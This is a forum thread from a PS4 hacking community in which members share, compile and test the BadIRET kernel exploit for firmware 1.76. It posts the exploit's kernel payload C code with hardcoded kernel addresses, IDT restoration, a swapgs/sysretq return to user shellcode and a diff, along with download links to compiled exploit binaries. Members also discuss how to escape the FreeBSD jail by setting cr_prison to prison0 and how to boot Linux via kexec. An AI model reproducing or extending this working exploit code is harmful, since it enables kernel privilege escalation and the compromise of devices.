Jump to content
eXtreme

Hack The PS4 - Status for End Users

Recommended Posts

1 hour ago, eXtreme said:

 

ok, u are right ;)

 

 

maybe he is not known for to reverse and maybe he is a new comer but maybe he find something, we don't know. I talked only since a few days with him, for me he have some coding knowledge and I don't think he's a poser or a liar.

i don't sayed he is a poser or a liar.

 

let me ask on a other way....how want this specific person be able to reverse a .sprx ?

 

SPRX  ---> Secured PRX

SKPRX ---> Secured Kernel PRX

SUPRX ---> Secured User PRX

 

The kernel of the PS4 could be reversed cause it was dumped out of the RAM as a .ELF. It isn't secured any more, it's no SELF ---> Secured ELF ;)

Share this post


Link to post
Share on other sites
11 minutes ago, Zer0xFF said:

Ok then, if we agreed I'm not completely useless, try this versions of BadIRET

https://drive.google.com/file/d/0B8quJDWCl01HNDhXd2tSSExTVWc/view?usp=sharing

googling around I've found IDT restoration code, which i added to the leaked code, few more changes and I've this.

 

@Mistawes there is your first public (i guess) working version of badIRET :)

 

&&

 

@eXtreme about what a user without a PS4 can do. :P

Edited by cfwprophet

Share this post


Link to post
Share on other sites

oh im a lazzy bastard. i havn't even my 1.76 setted up. it's some where in a dark box and have to fear the next day :D

 

but for what it looks like i really need to go on with the RCO tool :P

 

Share this post


Link to post
Share on other sites
1 minute ago, cfwprophet said:

oh im a lazzy bastard. i havn't even my 1.76 setted up. it's some where in a dark box and have to fear the next day :D

 

but for what it looks like i really need to go on with the RCO tool :P

 

lol, you shouldn't really be retweeting it just yet then :P

Share this post


Link to post
Share on other sites

why not ? you did use google and found some information. which you used to solve a problem. even if it may not the correct solution on the first shot, it's the way how things are done. :)

Share this post


Link to post
Share on other sites
9 minutes ago, cfwprophet said:

why not ? you did use google and found some information. which you used to solve a problem. even if it may not the correct solution on the first shot, it's the way how things are done. :)

 

I was just hoping someone would verify this before hand, but ah well, more people will see this now and perhaps report back.

Share this post


Link to post
Share on other sites

Encase the public GIT goes down.

 

void payload()
 {
-	struct thread *td;
+struct thread *td;
 	
-	//Restore IDT state
-	void (*setidt)() = (void *)0xFFFFFFFF82603FA0;
+//Restore IDT state
+void (*setidt)() = (void *)0xFFFFFFFF82603FA0;
 	
-	setidt(IDT_DE, 0xFFFFFFFF825FED40, SDT_SYSIGT, SEL_KPL, 0);
-
+setidt(IDT_DE, 0xFFFFFFFF825FED40, SDT_SYSIGT, SEL_KPL, 0);
 
 setidt(IDT_DB, 0xFFFFFFFF825FECB0, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_NMI, 0xFFFFFFFF825FF3E0, SDT_SYSIGT, SEL_KPL, 2);
 
-
 setidt(IDT_BP, 0xFFFFFFFF825FECE0, SDT_SYSIGT, SEL_UPL, 0);
 
-
 setidt(IDT_OF, 0xFFFFFFFF825FED70, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_BR, 0xFFFFFFFF825FEDA0, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_UD, 0xFFFFFFFF825FEDD0, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_NM, 0xFFFFFFFF825FEE00, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_DF, 0xFFFFFFFF825FF0C0, SDT_SYSIGT, SEL_KPL, 1);
 
-
 setidt(IDT_FPUGP, 0xFFFFFFFF825FEE30, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_TS, 0xFFFFFFFF825FEF20, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_NP, 0xFFFFFFFF825FEF40, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_SS, 0xFFFFFFFF825FEF60, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_GP, 0xFFFFFFFF825FF1E0, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_PF, 0xFFFFFFFF825FF170, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_MF, 0xFFFFFFFF825FEEC0, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_AC, 0xFFFFFFFF825FEF80, SDT_SYSIGT, SEL_KPL, 0);
 
-
 setidt(IDT_MC, 0xFFFFFFFF825FEE60, SDT_SYSIGT, SEL_KPL, 0);
 
 setidt(IDT_XF, 0xFFFFFFFF825FEEF0, SDT_SYSIGT, SEL_KPL, 0);
 
 setidt(IDT_DTRACE_RET, 0xFFFFFFFF825FED10, SDT_SYSIGT, SEL_UPL, 0);
 
-
-
 	// Switch back to kernel GS base
 	asm volatile("swapgs");
 
@@ -79,7 +60,7 @@ setidt(IDT_DTRACE_RET, 0xFFFFFFFF825FED10, SDT_SYSIGT, SEL_UPL, 0);
 	} 
 
 	// return to user mode to spawn the shell
-    asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
+    asm ("swapgs; sysretq;" :: "c"(user_shellcode)); // store the shellcode addr to rcx
 }
 
 void user_shellcode()

Revision 2

 

void payload()
{
struct thread *td;
	
//Restore IDT state
void (*setidt)() = (void *)0xFFFFFFFF82603FA0;
	
setidt(IDT_DE, 0xFFFFFFFF825FED40, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_DB, 0xFFFFFFFF825FECB0, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_NMI, 0xFFFFFFFF825FF3E0, SDT_SYSIGT, SEL_KPL, 2);

setidt(IDT_BP, 0xFFFFFFFF825FECE0, SDT_SYSIGT, SEL_UPL, 0);

setidt(IDT_OF, 0xFFFFFFFF825FED70, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_BR, 0xFFFFFFFF825FEDA0, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_UD, 0xFFFFFFFF825FEDD0, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_NM, 0xFFFFFFFF825FEE00, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_DF, 0xFFFFFFFF825FF0C0, SDT_SYSIGT, SEL_KPL, 1);

setidt(IDT_FPUGP, 0xFFFFFFFF825FEE30, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_TS, 0xFFFFFFFF825FEF20, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_NP, 0xFFFFFFFF825FEF40, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_SS, 0xFFFFFFFF825FEF60, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_GP, 0xFFFFFFFF825FF1E0, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_PF, 0xFFFFFFFF825FF170, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_MF, 0xFFFFFFFF825FEEC0, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_AC, 0xFFFFFFFF825FEF80, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_MC, 0xFFFFFFFF825FEE60, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_XF, 0xFFFFFFFF825FEEF0, SDT_SYSIGT, SEL_KPL, 0);

setidt(IDT_DTRACE_RET, 0xFFFFFFFF825FED10, SDT_SYSIGT, SEL_UPL, 0);

	// Switch back to kernel GS base
	asm volatile("swapgs");

	// Get td pointer
	asm volatile("mov %0, %%gs:0" : "=r"(td));

	// Send a message
	{
		int (*sendto)(struct thread *td, struct sendto_args *uap) = (void *)0xFFFFFFFF8249EC10;

		struct sendto_args args = { sock, criticalPayloadMessage, strlen(criticalPayloadMessage), 0, NULL, 0 };
		sendto(td, &args);
	} 

	// return to user mode to spawn the shell
    asm ("swapgs; sysretq;" :: "c"(user_shellcode)); // store the shellcode addr to rcx
}

void user_shellcode()
{
	//printf("[*] Got root!\n");
    exit(0);
}

 

 

Credits:https://gist.github.com/Relys/6251b8f55a088545048f/2dba1fce5cac299afc091d962eebd99670487f72

Edited by PS4BOT

Share this post


Link to post
Share on other sites
2 hours ago, Zer0xFF said:

Ok then, if we agreed I'm not completely useless, try this versions of BadIRET

https://drive.google.com/file/d/0B8quJDWCl01HNDhXd2tSSExTVWc/view?usp=sharing

googling around I've found IDT restoration code, which i added to the leaked code, few more changes and I've this.

 

thank you I can test it in 2 hours.

Share this post


Link to post
Share on other sites

 

Nice to see some progress in here lol!

 

On 16.3.2016 at 6:58 PM, Zer0xFF said:

 

as far as the steps you mentioned everything seems to be in order,

You're also probably using the extreme-modding PS4-Playground to load the binary(BadIRET),

but i've noticed this PR few days ago, Fix for "There is not enough free system memory." error when loading a binary

the chances is extreme-modding hasn't been updated yet, so you're better of setting up your own localhost and using the updated version directly from CtrutE. PS4-playground

 

if @eXtreme is the same extreme site owner, perhaps you can update that.

 

 

nah i use playground locally and map it with charles proxy, its not the playground since i applied the fix that kr105 applied to the github. Its because my badiret.bin has a bad return to userland method, i used the one that was on relys github thats been uploaded here and still trying to get it working. That bin that you uploaded works just as its supposed to what did you use for your return, ive got the sidt code with the correct addresses for restoring idt but ive been using "asm volatile ("swapgs; sysretq;" :: "c"(user_shellcode));" ive tried it with iretq as well but im getting loop for executing critical payload. it might be my shell code since i use a return and not an exit() since gcc complains. Do i need to include a header for exit() or is there an alternative like a syscall for the ps4? Any advice would be greatly appreciated @Zer0xFF, this has been great fun and is getting me motivated to get back to learning c.

 

*Just for clarity since you said you don't have the means to test it, your bin loads, executes, and returns to web browser without a crash. I don't know the ip so i wasn't able to see anything on the tcp-dump but it looks like it works fine. Nice job Zer0xFF! :double-thumbs-up:

 

Edited by cfwprophet

Share this post


Link to post
Share on other sites

try

 

return 0;

:P

 

ps. or better say it is ok to use that.

 

How you compile your code ?

Edited by cfwprophet

Share this post


Link to post
Share on other sites
1 hour ago, wildcard said:

 

Nice to see some progress in here lol!

 

 

 

nah i use playground locally and map it with charles proxy, its not the playground since i applied the fix that kr105 applied to the github. Its because my badiret.bin has a bad return to userland method, i used the one that was on relys github thats been uploaded here and still trying to get it working. That bin that you uploaded works just as its supposed to what did you use for your return, ive got the sidt code with the correct addresses for restoring idt but ive been using "asm volatile ("swapgs; sysretq;" :: "c"(user_shellcode));" ive tried it with iretq as well but im getting loop for executing critical payload. it might be my shell code since i use a return and not an exit() since gcc complains. Do i need to include a header for exit() or is there an alternative like a syscall for the ps4? Any advice would be greatly appreciated Zer0xFF, this has been great fun and is getting me motivated to get back to learning c.

 

exit wouldn't compile with me too, but since the payload method is a void return method, there isn't even a need for a return, but a return shouldn't effect the result anyway. aka I don't call exit or return.

 

Quote

*Just for clarity since you said you don't have the means to test it, your bin loads, executes, and returns to web browser without a crash. I don't know the ip so i wasn't able to see anything on the tcp-dump but it looks like it works fine. Nice job Zer0xFF! :double-thumbs-up:

 

the IP was left with the default values 192.168.1.119 I'd assume since you know how to use charles proxy, you know how to change your PC ip?

if not, what are you running OSX/win/linux or maybe even post your IP and i might even compile you one.


if this works, we'll probably have linux by this weekend, I just need to figure how to "cred->cr_prison = &prison0;"

for the life of me, I couldn't find a way to create prison0 or reference it, without referencing half the freebsd kernel.

I've spent all day trying to figure it out with no luck... yet I have exec and linux kernel compiled. *so close yet so far!!*(bold statement, so i hope i don't disappoint)


but as @cfwprophet said, how are you building this, I'm doing it on freebsd myself.

 

@cfwprophet what is your SDK fix? i never had an issue with it before.

Edited by Zer0xFF

Share this post


Link to post
Share on other sites

 

9 minutes ago, Zer0xFF said:

 

exit wouldn't compile with me too, but since it the payload method is a void return method, there isn't even a need for a return, but a return shouldn't effect the result anyway. aka I don't call exit or return.

 

the IP was left with the default values 192.168.1.119 I'd assume since you know how to use charles proxy, you know how to chance your PC ip?

if not, what are you running OSX/win/linux or maybe even post your IP and i might even compile you one.

 


but as @cfwprophet said, how are you building this, I'm doing it on freebsd myself.

 

@cfwprophet what is your SDK fix? i never had an issue with it before.

ah got yah that makes more sense now. yeah i only tested it quick so it didnt occur to me to change my pc ip to the known debug ip. of all ips thats the one id guess too lol :P yeah ill test it now on it and let you know no need to compile me one.

Share this post


Link to post
Share on other sites
21 minutes ago, Zer0xFF said:

@cfwprophet what is your SDK fix? i never had an issue with it before.

not specific my fix and it depends when you got it from git. one of the examples didn't compile. i identifyed the source but in case im blind, ( :P ) i didn't see where the problem was and told @masterzorag about. he then saw the missing initUSB();

 

ps.

to be more specific i told him about that the compiler points to usb.c (or how ever the source is called) but i simple didn't see that damn missing initUSB() in the example.

 

ps². 

but in main i did right now see, some changes have ben done to the SDK the last few days.

Fix kqueue type

Edited by cfwprophet

Share this post


Link to post
Share on other sites
13 minutes ago, cfwprophet said:

not specific my fix and it depends when you got it from git. one of the examples didn't compile. i identifyed the source but in case im blind, ( :P ) i didn't see where the problem was and told @masterzorag about. he then saw the missing initUSB();

 

ps.

to be more specific i told him about that the compiler points to usb.c (or how ever the source is called) but i simple didn't see that damn missing initUSB() in the example.

 

ps². 

but in main i did right now see, some changes have ben done to the SDK the last few days.

Fix kqueue type

 

My sdk is uptodate but I just wanted to confirm there isn't anything you added that wasn't up in github :good:

Share this post


Link to post
Share on other sites

Zer0xFF upon testing the bin with 192.168.1.119/ firewall off/ port 9023 im consistently getting stuck on executing... and was able to press the ps button to home screen during entering critical payload which i dont think ive been able to do before. its not crashing the kernel but i dont have controller connection even when plugged in. ill have to test more tomorrow.

 

Im on windows 7 running Charles to local playground files, and using Ubuntu vm for the PS4SDK fully compiled. Ive been compiling badiret.bin for a while now and been able to play with them for different results. I believe its my return to user land via the asm volatile using swapgs and systretq. just like on relys github. with iretq in place of sysretq i get infinite payload loop and with sysretq i get a out of memory error. my shellcode is just like in relys just with return 0 now and still haven't gotten it. ill have to test when i get the chance again. lol i could never get &prison0 working either and was looking into including a load of freebsd library! yeah umm f that lol. there must be a way to do in in the defines header. ive got the creds resolved but when i include them my ps4 crashes and shuts off but i havent tried it with the return 0 at the end of my payload idk. lol itll get there. same here on the kexec and ps4-linux, i think sonyUSA had some code on a pastebin i took note of for loading it. it was taken down but i copied it here. http://pastebin.com/dQ0gj3Ez

Edited by wildcard

Share this post


Link to post
Share on other sites
13 minutes ago, wildcard said:

Zer0xFF upon testing the bin with 192.168.1.119/ firewall off/ port 9023 im consistently getting stuck on executing... and was able to press the ps button to home screen during entering critical payload which i dont think ive been able to do before. its not crashing the kernel but i dont have controller connection even when plugged in. ill have to test more tomorrow.

not crashing the kernel is a good sign i guess, so the IDT is working as it should.

Quote

 

Im on windows 7 running Charles to local playground files, and using Ubuntu vm for the PS4SDK fully compiled. Ive been compiling badiret.bin for a while now and been able to play with them for different results. I believe its my return to user land via the asm volatile using swapgs and systretq. just like on relys github. with iretq in place of sysretq i get infinite payload loop and with sysretq i get a out of memory error. my shellcode is just like in relys just with return 0 now and still haven't gotten it. ill have to test when i get the chance again. lol i could never get &prison0 working either and was looking into including a load of freebsd library! yeah umm f that lol. there must be a way to do in in the defines header. ive got the creds resolved but when i include them my ps4 crashes and shuts off but i havent tried it with the return 0 at the end of my payload idk. lol itll get there. same here on the kexec and ps4-linux, i think sonyUSA had some code on a pastebin i took note of for loading it. it was taken down but i copied it here. http://pastebin.com/dQ0gj3Ez

OOPS, i didn't switch sysreq to ireq, ill build it now and post that up soon

and looking at sonyUSA, it's much the same, except it doesn't try to return shell, but boot linux straight away, this is what I'm also trying to achieve,

but I haven't added any of the linux kexec code to badIRET yet, as i wanna make sure this is working first.

 

also, i couldn't get badIRET to build on ubuntu, but the linux kernel builds fine.

Edited by Zer0xFF

Share this post


Link to post
Share on other sites

which set up you have ?

 

hum..may should update the PS4_Compile_Ubuntu with the SDK fixes + psxdev's ps4dev source (EDIT: install language pkg's and change to english :P ) and upload it...

 

by the way try this.

 

ps.

you need clang + llvm + a special build of gcc to compile for PS4.

Edited by cfwprophet

Share this post


Link to post
Share on other sites
6 minutes ago, cfwprophet said:

which set up you have ?

 

hum..may should update the PS4_Compile_Ubuntu with the SDK fixes + psxdev's ps4dev source and upload it...

 

by the way try this.

 

I've a Ubuntu 16.04 setup and freebsd 10.X

I got linux kernel to build on ubuntu but didn't try to build it on freebsd and badIRET to build on freebsd but this won't build on ubuntu,

i can't find the freebsd libc for ubuntu.

 

i actually only have 1 gb free as all my free memory is allocated to freeBSD, but if you post how you got libc on ubuntu, i can probably get it to work.

 

@wildcard

 

this is a newer build with fix ireq https://drive.google.com/file/d/0B8quJDWCl01HTkRHUmRySHZDNU0/view?usp=sharing

Share this post


Link to post
Share on other sites

it's inlcuded into the PS4 SDK too. ;) 

 

the compiled one i uploaded have it in it. give a shot. i think it is on the first page of this thread.

 

edit.
on the second one here.

 

image1gv0j5kz93w.png

 

Edited by cfwprophet

Share this post


Link to post
Share on other sites

I've made few more builds in hopes that we might get something right :/

 

https://drive.google.com/open?id=0B8quJDWCl01HSEVQU2lsaGRaR2c

if anyone wants to try them, try Bad*-4* and Bad*-5*

not the u=ubuntu f=freebsd build, there shouldn't be any difference between them, but I've still built them for the sake of it.

extreme = just has the ip set to 192.168.199.241 while the normal/default is 192.168.1.119

 

@wildcard looking at SonyUSA code, she/he doesn't call iretq but just 'swaps' which is what I'm trying in version 5.

if this still doesn't work, I'll just add the linux kexec call to that since we know we're getting as far as critical payload and so we might as well just try to boot linux straight away,

since kexec, boots a new kernel, that kernel shouldn't be crashing, so we might atleast have that much to work with.

Edited by Zer0xFF

Share this post


Link to post
Share on other sites

....well im pretty sure that i have seen some where 'swapgs' and 'iretq' ...for sure it depends on what you want to do, if there is only one off or both together...   :angel:

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...